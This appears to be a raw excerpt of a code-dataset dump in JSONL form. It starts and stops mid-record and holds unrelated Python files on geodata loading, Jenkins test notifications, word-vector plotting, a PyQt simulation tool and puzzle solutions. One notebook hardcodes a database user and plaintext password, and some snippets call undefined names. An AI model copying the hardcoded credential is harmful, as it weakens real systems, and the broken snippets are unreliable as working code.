\"\"\"\n all_classes = os.listdir(path_to_dataset)\n employee_code = {each_class.split('_')[-1]: '_'.join(each_class.split('_')[:-1]) \\\n for each_class in all_classes}\n print(employee_code)\n # check employee code incorrect\n ds_employee = get_employee(path_employee)\n # count percent checking\n for employee in tqdm(employee_code):\n if employee in ds_employee:\n continue\n else:\n print(\"Occurs when check employee: {}-{}\".format(employee, employee_code[employee]))\n return employee_code\n\n\ndef get_dataset(path_ds, ratio):\n \"\"\"\n return: train_set path, test_set path, number of classes, number of images\n \"\"\"\n\n all_path = glob.glob(os.path.join(path_ds, '*/*'))\n employees = os.listdir(os.path.join(path_ds))\n number_classes = len(employees)\n number_images = len(all_path)\n np.random.shuffle(all_path)\n split = int(math.floor(number_images*(1-ratio)))\n train_set = all_path[:split]\n test_set = all_path[split:]\n\n return train_set, test_set, number_classes, number_images\n\n\ndef data_loader():\n pass\n\nif __name__ == '__main__':\n train_set, test_set, number_classes, number_images = get_dataset('datasets', 0.2)\n print(number_classes)\n print(number_images)\n print(len(train_set))\n print(len(test_set))\n _ = get_employee_code('datasets', 'employee/employee.xlsx')\n","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"518525964","text":"# %%\nimport os\nimport tridy\nfrom tridy import GeoConcept, SubGeoConcept, MetaData, Table, View, DBStorage, DataSource, Feature, FeatureWithID, AdmUnitFeature, OLUFeature, Grid, Imagee, ds_from_metadata, xml_lpis_cz_reader, lpis_cz__posledni_aktualizace, get_listvalues_from_generator, apply_function, select_nodes_from_graph, unzip_file, find_neighbors_till, connection_parameters_to_pg, transform_name_to_postgresql_format, world_to_pixel \nfrom importlib import reload\nimport requests\nimport datetime\nimport re\nfrom io import BytesIO\n\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nfrom osgeo import ogr, osr, gdal\nimport networkx as nx\nimport numpy as np\nimport json\nimport binascii\nimport copy\nimport time\n\nfrom lxml import etree\n\nfrom ipyleaflet import Map, GeoJSON\n\n# %%\ndel(GeoConcept, SubGeoConcept, MetaData, Table, View, DBStorage, DataSource, Feature, FeatureWithID, AdmUnitFeature, OLUFeature, Grid, Imagee, ds_from_metadata,xml_lpis_cz_reader,get_listvalues_from_generator,apply_function,select_nodes_from_graph,world_to_pixel)\nreload(tridy)\nfrom tridy import GeoConcept, SubGeoConcept, MetaData, Table, View, DBStorage, DataSource, Feature, FeatureWithID, AdmUnitFeature, OLUFeature, Grid, Imagee, ds_from_metadata, xml_lpis_cz_reader, get_listvalues_from_generator, apply_function, select_nodes_from_graph,world_to_pixel\n\n# %%\ndef compilable_tree_dictionary(object): \n g_dict=\\\n {'admunit':{'object':object},\\\n 'admunit__tree':{'object':'admunit','function':'return_graph_representation'},\\\n 'admunit__tree__reverse':{'object':'admunit__tree','function':'reverse'},\\\n 'admunit__tree__level3':{'function':select_nodes_from_graph,'parameters':['admunit__tree','level',3]},\\\n 'admunit__tree__level4':{'function':select_nodes_from_graph,'parameters':['admunit__tree','level',4]}}\n return g_dict\n\n# %%\ndef find_neighbors_level(graph,start_node,level):\n if graph.nodes()[start_node]['level']==level:\n yield start_node\n else:\n for n in graph.neighbors(start_node):\n yield from find_neighbors_level(graph,n,level) \n\n# %%\ndef get_ruian_au_feature_geometry_from_wfs(gml_id):\n url='https://services.cuzk.cz/wfs/inspire-au-wfs.asp?service=WFS&request=GetFeature&typeName=au:AdministrativeUnit&maxFeatures=1&featureID=%s&version=2.0.0' %gml_id\n r=requests.get(url,stream=False)\n if r.status_code==200:\n tree=etree.parse(BytesIO(r.content))\n root=tree.getroot()\n geom=root.find('.//{http://www.opengis.net/gml/3.2}MultiSurface')\n geom_ogr=ogr.CreateGeometryFromGML(etree.tostring(geom).decode())\n return geom_ogr.ExportToWkt()\n else:\n return 'WFS no works'\n\n# %%\n#for the case when data has to be downloaded externally initialization of requests session variable with setting of number of retries\ns = requests.Session()\nretries = Retry(total=5, backoff_factor=1, status_forcelist=[ 502, 503, 504 ])\ns.mount('http://', HTTPAdapter(max_retries=retries))\n\n# %%\nreplacement_dictionary = {\"[posledni_den_mesice]\":(datetime.datetime.today().replace(day=1)-datetime.timedelta(days=1)).strftime('%Y%m%d'),\"[lpis_cz__posledni_aktualizace]\":lpis_cz__posledni_aktualizace().strftime('%Y%m%d'), \"[vcera]\":(datetime.datetime.today().replace(day=1)-datetime.timedelta(days=1)).strftime('%Y%m%d')} \njson_feature_structure=[{\"name\":\"id\",\"type\":\"serial primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"}]\njson_feature_with_bigid_structure=[{\"name\":\"id\",\"type\":\"bigint primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"}]\njson_admin_unit_structure=[{\"name\":\"id\",\"type\":\"integer primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"},{\"name\":\"level\",\"type\":\"integer\"},{\"name\":\"parent_id\",\"type\":\"text\"}]\njson_admin_unit_structure_at=[{\"name\":\"id\",\"type\":\"text primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"},{\"name\":\"level\",\"type\":\"integer\"},{\"name\":\"parent_id\",\"type\":\"text\"}]\njson_feature_with_raster_structure=[{\"name\":\"id\",\"type\":\"serial primary key\"},{\"name\":\"geom\",\"type\":\"geometry\"},{\"name\":\"data\",\"type\":\"json\"},{\"name\":\"raster_maps\",\"type\":\"raster\"}]\n\n# %%\nadmunit_cz__metadata=MetaData('Administrative units in Czech Republic',\n {\"url\":\"https://vdp.cuzk.cz/vymenny_format/soucasna/[posledni_den_mesice]_ST_UKSG.xml.zip\",\n \"format\":\"GML\", \"compression\":\"zip\"},'data')\n\n# %%\nadmunit_cz__ds=ds_from_metadata(admunit_cz__metadata)\nadmunit_cz=GeoConcept('Administrative units in Czech Republic','Administrative units in Czech Republic. All levels.',\n 'AdmUnitFeature',json_admin_unit_structure, data_source=admunit_cz__ds, subgeoconcepts=[] )\n\n# %%\nurl_adresa=admunit_cz.get_data_source().get_attributes()['url']\nfor i in re.findall('\\[.*?\\]',url_adresa):\n if i in list(replacement_dictionary.keys()):\n url_adresa=url_adresa.replace(i,replacement_dictionary[i])\n \nadmunit_cz.get_data_source().set_attribute({'url':url_adresa})\ndel(url_adresa)\n\n# %%\n#admunit_cz.get_data_source().download_data('archive.zip',s,'all',os.getcwd())\nadmunit_cz.get_data_source().set_data_file('20201031_ST_UKSG.xml')\n\n# %%\nconcept_list=['Staty','Vusc','Okresy','Obce','KatastralniUzemi']\nconcept_additional_attributes={'Staty':{'level_value':0,'parent_value':'null','id_attribute':'Kod'},\n 'Vusc':{'level_value':1,'parent_value':'1','id_attribute':'Kod'},\n 'Okresy':{'level_value':2,'parent_attribute':'VuscKod','id_attribute':'Kod'},\n 'Obce':{'level_value':3,'parent_attribute':'OkresKod','id_attribute':'Kod'},\n 'KatastralniUzemi':{'level_value':4,'parent_attribute':'ObecKod','id_attribute':'Kod'}}\n\n# %%\nfor l in list(set(concept_list).intersection(set(admunit_cz.get_data_source().list_layers()))):\n admunit_cz.append_subgeoconcept(SubGeoConcept(l,l,'AdmUnitFeature',admunit_cz.get_attributes(),data_source=DataSource(admunit_cz.get_data_source().get_type(),admunit_cz.get_data_source().get_name(),({**admunit_cz.get_data_source().get_attributes(),**{'layer':l}}),None,admunit_cz.get_data_source().get_data_file()),supergeoconcept=admunit_cz,table_inheritance=False,type='semantic',subgeoconcepts=[]))\n\n# %%\n#administrative territorial units\ndbs_admin_connection={'dbname':'olu_administrative_units','user':'euxdat_admin','host':'euxdat-db-svc','port':'5432','password':'Euxdat12345'}\ndbs_admin=DBStorage(dbs_admin_connection)\ndbs_admin.connect()\ndbs_admin.disconnect()\ndbs_admin.connect()\n\n# %%\nadmunit_cz.create_table(dbs_admin, name='default',scheme='cz',conflict='append')\n\n# %%\nfor sub in admunit_cz.get_subgeoconcepts():\n sub.set_table(View(sub.get_name(),sub.get_attributes(), sub.get_supergeoconcept().get_table(),\"level=%s\" % (concept_additional_attributes[sub.get_name()]['level_value']), dbs=dbs_admin, scheme='public', type='usual'))\n dbs_admin.execute(sub.get_table().create_script())\n\n# %%\nwgs84_sr=osr.SpatialReference()\nwgs84_sr.ImportFromProj4('+proj=longlat +datum=WGS84 +no_defs')\n\nsjtsk5514_sr=osr.SpatialReference()\nsjtsk5514_sr.ImportFromProj4('+proj=krovak +lat_0=49.5 +lon_0=24.83333333333333 +alpha=30.28813975277778 +k=0.9999 +x_0=0 +y_0=0 +ellps=bessel +units=m +towgs84=570.8,85.7,462.8,4.998,1.587,5.261,3.56 +no_defs')\n\nsjtsk5514_to_wgs84=osr.CoordinateTransformation(sjtsk5514_sr,wgs84_sr)\n\n# %%\nsub=admunit_cz.get_subgeoconcept_by_name('Okresy')\n\n# %%\nwith open('okresy.geojson', 'w', encoding='utf-8') as file:\n geojson={\"type\": \"FeatureCollection\", \"features\": [] }\n features=sub.read_features_from_table(100)\n for f in features:\n if len(f)>0:\n for feature in f:\n feature.transform_geometry(sjtsk5514_to_wgs84)\n geojson[\"features\"].append(feature.export_to_geojson())\n else:\n break\n json.dump(geojson, file, ensure_ascii=False, indent=4)\n\n# %%\nwith open('okresy.geojson', 'r') as f:\n data = json.load(f)\n \nm = Map(center=(49.5,14.5), zoom=6)\n\ngeo_json = GeoJSON(\n data=data\n)\n \nm.add_layer(geo_json)\n\nm\n\n# %%\n","sub_path":"jupyter_examples/administrative_units_in_czech_republic.py","file_name":"administrative_units_in_czech_republic.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386046129","text":"def connect(url):\n import re\n import socket\n\n try:\n mysock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n mysock.connect((re.findall('http://(.+?)/',url)[0],80))\n mysock.send(b'GET '+url.encode()+b' HTTP/1.0\\n\\n')\n except:\n return('please enter valid url')\n\n data=bytes()\n while True:\n new=mysock.recv(10000)\n if len(new)<1: break\n data=data+new\n mysock.close()\n\n return(data)","sub_path":"socket connect.py","file_name":"socket connect.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"327492453","text":"\n\nimport yaml\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nfrom query import QueryExecutor\n\nif __name__ == '__main__':\n config = yaml.safe_load(open('config.yml'))\n models_dir = config['models_dir']\n mongo_connection = config['mongo_connection']\n query_executor = QueryExecutor(mongo_connection, models_dir)\n doc2vec_similar(query_executor)\n\n\nX = model[model.wv.vocab]\npca = PCA(n_components=2)\nresult = pca.fit_transform(X)\n# create a scatter plot of the projection\npyplot.scatter(result[:, 0], result[:, 1])\nwords = list(model.wv.vocab)\nfor i, word in enumerate(words):\n\tpyplot.annotate(word, xy=(result[i, 0], result[i, 1]))\npyplot.show()","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642983703","text":"data = [ord(x) for x in open('input.txt').readline().strip()]\ndata += [17, 31, 73, 47, 23]\nrope = list(range(256))\nposition = 0\nskip = 0\nfor _ in range(64):\n for rope_length in data:\n twisted = []\n for x in range(rope_length):\n twisted.append(rope[(position + x) % 256])\n twisted.reverse()\n for x in range(rope_length):\n rope[(position + x) % 256] = twisted[x]\n position += (rope_length + skip) % 256\n skip += 1\n\ndense_hash = []\nfor x in range(0, 256, 16):\n dense_num = rope[x]\n for y in range(15):\n dense_num = dense_num ^ rope[x + y + 1]\n dense_hash.append(dense_num)\nprint(''.join([format(x, '02x') for x in dense_hash]))\n","sub_path":"day10/day10pt2.py","file_name":"day10pt2.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"24249825","text":"# 2. На языке Python 3 разработать 2 программы (модули) для обработки одномерных массивов (векторов),\n# используя списки. Одна программа долж-на работать с целочисленным вектором, а вторая с вещественным вектором.\n\n# 1) Дан целочисленный вектор А(n). Подсчитать сколько раз встречается в этом векторе максимальное по величине число.\n# 2) Дан целочисленный вектор А(n). Найти наибольшее из четных и количество нечетных\n\ndef task1(vector):\n vector.sort()\n print(\"Максимальное значение\", vector[-1], \"встречается\", vector.count(vector[-1]), \"раз\")\n\n\ndef task2(vector):\n odd = []\n even = []\n for i in vector:\n if int(i) % 2 == 0:\n odd.append(int(i))\n else:\n even.append(int(i))\n try:\n max_odd = sorted(odd)[-1]\n except IndexError:\n max_odd = \"нет чётных\"\n print(\"Наибольшее из чётных - \", max_odd, \"Количество нечётных - \", len(even))\n\n\nif __name__ == '__main__':\n task1([32.23, 43.32, 41.43, 43.14, 43, 43.32, 12.43, 33.23, 12, 22])\n task2([32, 1, 4, 23, 13, 44, 12, 44, 21, 12, 44])\n task2([1, 1, 1, 1])\n","sub_path":"lab2_vectors.py","file_name":"lab2_vectors.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"448542342","text":"\nfrom django import template\nfrom django.utils.html import format_html\n\nregister = template.Library()\n\n\n@register.filter()\ndef check_color(elem):\n color = 'white'\n text = '-'\n if elem != '':\n text = float(elem)\n if text < 0:\n color = 'green'\n elif 1 < text < 2:\n color = 'LightSalmon'\n elif 2 <= text <= 5:\n color = 'Red'\n elif text > 5:\n color = 'DarkRed'\n return format_html(\n '{}',\n color,\n text,\n )\n\n","sub_path":"dynamic-templates/task1/app/templatetags/app_tags.py","file_name":"app_tags.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"385842532","text":"import os\nimport django\nimport time\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"unb_libraries_status.settings\")\ndjango.setup()\n\nfrom notifications.models import Event, Notification\nfrom test_cases.models import JenkinsBuild, TestCase\nimport sys, importlib\n\nbuild_number = int(sys.argv[1])\nbuild = JenkinsBuild(build_number)\nbuild.evaluate_build()\n\nfailed_tests = TestCase.get_failed_tests()\nnotification_config = importlib.import_module('notifications.config.notification_config')\n\ncurrent_time = int(time.strftime('%H%M'))\nexclude_tests = []\nfor mute in notification_config.MUTE_TESTS:\n if 'start' in mute and (current_time < mute['start'] or current_time > mute['end']):\n continue\n\n exclude_tests += mute['tests']\n\nfailed_tests = [item for item in failed_tests if item not in exclude_tests]\n\nevent = Event.get_latest_event(failed_tests)\n\nif (len(failed_tests) > 0):\n if (event.notification_required()):\n Notification.send_notifications(event)\nelse:\n if (event != None and event.is_open()):\n if (event.notification_required()):\n Notification.send_notifications(event)\n event.close()\n","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"7676055","text":"# cE_simulation_tool.py\n'''\n本文件是写的界面与后台仿真线程\n'''\nfrom defination_read import *\nfrom UI.simulation_exe_Form import Ui_Form # pyUIC自动生成的pyqt5界面\nfrom members.CN_member import *\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets # 一些必要的qt包\nimport sys # 线程挂起恢复必要的包\nimport os # 必要的包\n\n\ndef format_members_id_role(xml_dom: xml.dom.minidom.Document):\n \"\"\"\n 格式化成员的id与角色,本函数仅用于获取仿真成员xml文件中的部分简单信息包含成员id,成员角色,各类成员的数量\n :param xml_dom: xml文件的dom对象\n :return: key为id与role的dict,成员总个数,primitive成员的数量,collective成员的数量,adviser成员的数量,monitor成员的数量\n \"\"\"\n root = xml_dom.documentElement # 获取dom对象的根\n # 初始化id_role字典\n id_role_dict = {\n 'id': list(),\n 'role': list()\n }\n member_info_labels = root.getElementsByTagName('memberInfo') # 获取memberInfo标签\n primitive_number = len(root.getElementsByTagName('primitiveInfo')) # 获取primitiveInfo标签\n collective_number = len(root.getElementsByTagName('collectiveInfo')) # 获取collectiveInfo标签\n adviser_number = len(root.getElementsByTagName('advisorInfo')) # 获取advisorInfo标签\n monitorMember_number = len(root.getElementsByTagName('monitorMemberInfo')) # 获取monitorMemberInfo标签\n for one_member_info_label in member_info_labels:\n id_role_dict['id'].append(one_member_info_label.getAttribute('成员ID'))\n id_role_dict['role'].append(one_member_info_label.getAttribute('成员类型'))\n return id_role_dict, len(\n member_info_labels), primitive_number, collective_number, adviser_number, monitorMember_number\n\n\nglobal_attribute_dict = dict() # 全局属性递推方法\nround_methods = dict() # 轮方法\n\nnet_p2p = pd.DataFrame() # 原子型成员网络\nnet_p2a = pd.DataFrame() # 原子型——建议者成员网络\nnet_p2m = pd.DataFrame() # 原子型——监控者成员网络\nnet_p2c = pd.DataFrame() # 原子型——集合型成员网络\nnet_c2m = pd.DataFrame() # 集合型——监控者成员网络\nnet_c2c = pd.DataFrame() # 集合型——集合型成员网络\n\nprimitives = None # 原子型单元集合\nadvisers = None # 建议者单元集合\nmonitorMembers = None # 监控者单元集合\ncollectives = None # 集合型单元集合\n\n\nclass uf_Form(QtWidgets.QWidget, Ui_Form):\n def __init__(self):\n super(uf_Form, self).__init__()\n self.setupUi(self)\n self.setFixedSize(self.width(), self.height())\n self.start_btn_icon = QtGui.QIcon(r'.\\UI\\播放按钮.ico')\n self.pause_btn_icon = QtGui.QIcon(r'.\\UI\\暂停.ico')\n stop_btn_icon = QtGui.QIcon(r'.\\UI\\停止.ico')\n self.start_or_pause_btn.setIcon(self.start_btn_icon)\n self.stop_btn.setIcon(stop_btn_icon)\n self.modify_dateEdit.setDate(QtCore.QDate.currentDate())\n self.members_filedialog_btn.clicked.connect(self.slot_btn_set_members_path)\n self.def_xml_filedialog_btn.clicked.connect(self.slot_btn_set_definition_path)\n self.record_filedialog_btn.clicked.connect(self.slot_btn_set_record_path)\n\n def slot_btn_set_definition_path(self):\n '''\n 读取仿真定义文件路径\n :return:\n '''\n try:\n xml_definition_path = QtWidgets.QFileDialog.getOpenFileName(self, \"选择仿真定义xml文件\", \"./\",\n \"XML Files (*.xml);;All Files (*)\")\n self.def_xml_path_edit.setText(xml_definition_path[0])\n definition_dom = read_xml(xml_definition_path[0])\n # 注册全局函数成员递推函数\n global global_attribute_dict, round_methods\n global_attribute_dict = register_global_attribute_method(definition_dom)\n round_methods = register_round_method(definition_dom)\n self.service_msg_log_text.append('Read definition from: ')\n self.service_msg_log_text.append(xml_definition_path[0])\n except:\n QtWidgets.QMessageBox.critical(self, \"错误\", \"仿真定义文件错误\")\n self.def_xml_path_edit.clear()\n self.service_msg_log_text.append('definition file error. ')\n raise\n\n def slot_btn_set_members_path(self):\n '''\n 读取所有成员的路径的槽函数\n :return:\n '''\n try:\n xml_members_path = QtWidgets.QFileDialog.getOpenFileName(self, \"选择仿真成员xml文件\", \"./\",\n \"XML Files (*.xml);;All Files (*)\")\n self.members_xml_path_edit.setText(xml_members_path[0])\n # 根据这个路径来读取成员\n member_dom = read_xml(xml_members_path[0])\n # 服务信息更新显示\n self.service_msg_log_text.append('Read member from: ')\n self.service_msg_log_text.append(xml_members_path[0])\n # 解析成员\n global net_p2p, net_p2a, net_p2m, net_p2c, net_c2m, net_c2c\n net_p2p, net_p2a, net_p2m, net_p2c, net_c2m, net_c2c = net_work_read(member_dom)\n global primitives, advisers, monitorMembers, collectives\n primitives, advisers, monitorMembers, collectives = member_read(member_dom)\n id_role_dict, member_number, p_number, c_number, a_number, m_number = format_members_id_role(member_dom)\n self.reset_member_tableWidget(member_number, id_role_dict)\n self.primitive_num_edit.setText(str(p_number))\n self.adviser_num_edit.setText(str(a_number))\n self.monitor_num_edit.setText(str(m_number))\n self.collective_num_edit.setText(str(c_number))\n self.service_msg_log_text.append(\"Primitive:{}|Adviser:{}|Monitor:{}|Collective:{}\".format(\n p_number, a_number, m_number, c_number\n ))\n except:\n QtWidgets.QMessageBox.critical(self, \"错误\", \"成员生成文件错误\")\n self.members_xml_path_edit.clear()\n self.service_msg_log_text.append('member XML file error. ')\n raise\n\n def reset_member_tableWidget(self, length, id_role_dict):\n self.member_tableWidget.setRowCount(length)\n item = self.member_tableWidget.horizontalHeaderItem(0)\n item.setText(QtCore.QCoreApplication.translate(\"Form\", \"Member\"))\n item = self.member_tableWidget.horizontalHeaderItem(1)\n item.setText(QtCore.QCoreApplication.translate(\"Form\", \"Role\"))\n self.member_tableWidget.setHorizontalHeaderItem(1, item)\n temp_arrow = 0\n for id, role in zip(id_role_dict['id'], id_role_dict['role']):\n id_item, role_item = QtWidgets.QTableWidgetItem(), QtWidgets.QTableWidgetItem()\n id_item.setText(QtCore.QCoreApplication.translate(\"Form\", id))\n role_item.setText(QtCore.QCoreApplication.translate(\"Form\", role))\n self.member_tableWidget.setItem(temp_arrow, 0, id_item)\n self.member_tableWidget.setItem(temp_arrow, 1, role_item)\n temp_arrow += 1\n\n def slot_btn_set_record_path(self):\n '''\n 设置仿真结果路径保存的槽函数\n :return:\n '''\n dir_record_path = QtWidgets.QFileDialog.getExistingDirectory(self, \"选择仿真记录文件夹\", os.getcwd())\n if dir_record_path == \"\":\n print('取消选择')\n return\n else:\n self.record_dir_path_edit.setText(dir_record_path)\n self.service_msg_log_text.append('Set record dictionary to: ')\n self.service_msg_log_text.append(dir_record_path)\n\n def start_check(self):\n if self.members_xml_path_edit.text() is \"\" or \\\n self.def_xml_path_edit.text() is \"\" or \\\n self.record_dir_path_edit.text() is \"\" or \\\n self.version_edit.text() is \"\" or\\\n self.generation_Edit.text() is \"\" or\\\n self.step_size_Edit.text() is \"\":\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n all_change_time = 2\n for chance_time in range(all_change_time):\n extend_path = input('请输入外部函数文件所在路径:')\n sys.path.append(extend_path)\n try:\n from aa__ import *\n\n print('外部函数包引用成功')\n break\n except:\n print('外部函数文件路径有误,您还有{}次机会'.format(all_change_time - chance_time - 1))\n if chance_time < all_change_time - 1:\n continue\n else:\n input('错误次数已达上限,请按回车键退出')\n exit(0)\n print(globals()['globalAttribute1'])\n print(globals()['A1']('new init', 1, 3))\n\n app = QtWidgets.QApplication(sys.argv)\n window = uf_Form()\n window.setWindowTitle('众智网络仿真执行工具软件')\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"simulation_tool.py","file_name":"simulation_tool.py","file_ext":"py","file_size_in_byte":9118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399480425","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 10 11:04:42 2018\n\n@author: Samuele Garda\n\"\"\"\n\ndef evaluate(eval_data,subs,simplifier,topn):\n \n#Initialize variables: \n potentialc = 0 \n potentialt = 0 \n precisionc = 0 \n precisiont = 0 \n recallt = 0\n \n eval_data = load_eval_data(eval_data)\n \n for idx,test_case in eval_data.iterrows():\n \n target = test_case['c_w']\n candidates = set(test_case['sub'])\n substitutions = simplifier.get_candidates(target, topn = topn)\n if target in substitutions: \n overlap = candidates.intersection(set(substitutions[target])) \n precisionc += len(overlap) \n if len(overlap)>0:\n potentialc += 1 \n precisiont += len(substitutions[target]) \n potentialt += 1 \n recallt += len(candidates) \n \n potential = float(potentialc)/float(potentialt) \n precision = float(precisionc)/float(precisiont) \n recall = float(precisionc)/float(recallt) \n fmean = 0.0 \n if precision==0.0 and recall==0.0: \n fmean = 0.0 \n else: \n fmean = 2*(precision*recall)/(precision+recall) \n \n #Return measures: \n return potential, precision, recall, fmean \n ","sub_path":"evaluation/test_eval_sub.py","file_name":"test_eval_sub.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"332148448","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport const\nimport numpy as np\nimport math\nimport tensorflow as tf\n\n\nclass Cbow(object):\n def __init__(self, corpus):\n self.corpus = corpus\n\n def test(self, word, k=10):\n Weight = tf.Variable(tf.random_normal([self.corpus.n_words, const.EMBEDDING_SIZE], -1.0, 1.0))\n inputs = tf.placeholder(tf.int32, [None])\n embed = tf.nn.embedding_lookup(Weight, inputs)\n\n # cosine\n test_embed = tf.placeholder(tf.float32, [None])\n test_input = tf.placeholder(tf.float32, [None])\n normed_embed = tf.nn.l2_normalize(test_embed, dim=0)\n normed_array = tf.nn.l2_normalize(test_input, dim=0)\n cosine_similarity = tf.reduce_sum(tf.multiply(normed_array, normed_embed))\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n # restore model\n tf.train.Saver().restore(sess, const.MODEL_PATH)\n\n vectors = sess.run(embed, feed_dict={inputs: range(self.corpus.n_words)})\n vocab = self.corpus.vocab\n idx = self.corpus.var_word(word)\n scores = []\n for i in range(len(vocab)):\n if vocab[i] == word or vocab[i] == const.U_TOKEN:\n continue\n vec_a = vectors[i].reshape([-1])\n vec_b = vectors[idx].reshape([-1])\n cosine_sim = sess.run(cosine_similarity, feed_dict={test_embed: vec_a, test_input: vec_b})\n scores.append([vocab[i], cosine_sim]) # calculates cosine similarity\n return sorted(scores, key=lambda x: x[1], reverse=True)[:k]\n\n def train(self):\n Weight = tf.Variable(tf.truncated_normal([self.corpus.n_words, const.EMBEDDING_SIZE],\n stddev=1.0 / math.sqrt(const.EMBEDDING_SIZE)))\n bias = tf.Variable(tf.zeros([self.corpus.n_words]))\n\n inputs = tf.placeholder(tf.int32, [const.BATCH_SIZE, const.WIN_SIZE])\n outputs = tf.placeholder(tf.int32, [const.BATCH_SIZE, 1])\n embed = tf.nn.embedding_lookup(tf.random_normal([self.corpus.n_words, const.EMBEDDING_SIZE], -1.0, 1.0), inputs)\n\n embed_sum = tf.reduce_sum(embed, 1)\n loss = tf.reduce_mean(\n tf.nn.sampled_softmax_loss(Weight, bias, outputs, embed_sum, 3, self.corpus.n_words)) # negative sampling\n optimizer = tf.train.AdamOptimizer(learning_rate=const.LR_RATE).minimize(loss)\n\n saver = tf.train.Saver()\n\n losses = []\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n\n for epoch in range(const.EPOCH):\n inps, targets = self.corpus.batch_data()\n _, _loss = sess.run([optimizer, loss], feed_dict={inputs: inps, outputs: targets})\n\n losses.append(_loss)\n if epoch % 100 == 0:\n print('epoch, ', epoch, 'mean loss', np.mean(losses))\n losses = []\n\n # save model\n saver.save(sess, const.MODEL_PATH)\n","sub_path":"nlp/embedding/word2vec/tf/cbow_neg.py","file_name":"cbow_neg.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"215990591","text":"def checkio(number):\n\n num = str(number)\n result = None\n for i in range(len(num)):\n if int(num[i]) == 0:\n continue\n if i == 0:\n result = int(num[i])\n else:\n result *= int(num[i])\n\n return result\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(123405) == 120\n assert checkio(999) == 729\n assert checkio(1000) == 1\n assert checkio(1111) == 1\n","sub_path":"checkio/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9216504","text":"# Copyright (c) 2019 The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom spinn_utilities.overrides import overrides\nfrom pacman.exceptions import (\n PacmanConfigurationException, PartitionMissingEdgesException)\nfrom pacman.model.graphs import AbstractMultiplePartition\nfrom pacman.model.graphs.machine import (\n AbstractSDRAMPartition, SDRAMMachineEdge)\n\n\nclass SourceSegmentedSDRAMMachinePartition(\n AbstractMultiplePartition, AbstractSDRAMPartition):\n \"\"\"\n An SDRAM partition that gives each edge its own slice of memory from a\n contiguous block. The edges all have the same destination vertex.\n \"\"\"\n __slots__ = [\n \"_sdram_base_address\",\n ]\n\n def __init__(self, identifier, pre_vertices):\n \"\"\"\n :param str identifier: The identifier of the partition\n :param str label: A label of the partition\n :param iterable(~pacman.model.graphs.AbstractVertex) pre_vertices:\n The vertices that an edge in this partition may originate at\n \"\"\"\n super().__init__(\n pre_vertices, identifier, allowed_edge_types=SDRAMMachineEdge)\n self._sdram_base_address = None\n\n def total_sdram_requirements(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return sum(edge.sdram_size for edge in self.edges)\n\n @property\n def sdram_base_address(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self._sdram_base_address\n\n @overrides(AbstractMultiplePartition.add_edge)\n def add_edge(self, edge):\n # check\n if len(self._destinations):\n if edge.post_vertex not in self._destinations:\n raise PacmanConfigurationException(\n f\"The {self.__class__.__name__} can only support \"\n \"1 destination vertex\")\n try:\n if len(self._pre_vertices[edge.pre_vertex]) != 0:\n raise PacmanConfigurationException(\n f\"The {self.__class__.__name__} only supports 1 edge from \"\n \"a given pre vertex.\")\n except KeyError as ex:\n raise PacmanConfigurationException(\n \"Edge pre_vertex is not a 